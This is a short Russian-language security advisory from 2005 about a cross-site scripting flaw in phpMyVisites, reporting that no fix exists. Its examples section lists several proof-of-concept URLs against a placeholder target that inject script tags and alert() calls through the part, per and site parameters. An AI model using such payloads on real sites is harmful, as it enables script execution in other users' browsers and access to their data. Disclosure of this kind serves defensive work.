Межсайтовый скриптинг в phpMyVisites

Дата публикации:	28.04.2005
Всего просмотров:	1188
Опасность:	Низкая
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
	Уязвимые версии: phpMyVisites Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры: http://[target]/phpmyvisites/index.php?part= "'/>[XSS]&stats=0 http://[target]/ph pmyvisites/index.php?part= configurations&img=1&stats=1&date=2005 -04-23&oldd=2005-04-23&per=1'"/> [xss]&site=1'"/>[xss]#ancre1 http://[target]/phpmyvisites/index.php?part= %22'/%3E%3Cscript%3Ealert()%3C/scr ipt%3E&stats=0 http://[target]/phpmyvisites/index.php?part= configurations&img=1&stats=1&date=2005 -04-23&oldd=2005-04-23&per=1%22'/% 3E%3 Cscript%3Ealert()%3C/script%3E http://[target]/phpmyvisites/index.php?part= suivi&img=1&stats=1&date=2005-04-24& oldd=2005-04-24&per=1&site=1'%22%3 E%3Cscript%3Ealert()%3C/ script%3E URL производителя: www.phpmyvisites.net Решение: Способов устранения уязвимости не существует в настоящее время.
Ссылки:	phpMyVisites Input Validation Errors Let Remote Users Conduct Cross-Site Scripting Attacks

Межсайтовый скриптинг в phpMyVisites

Подпишитесь на email рассылку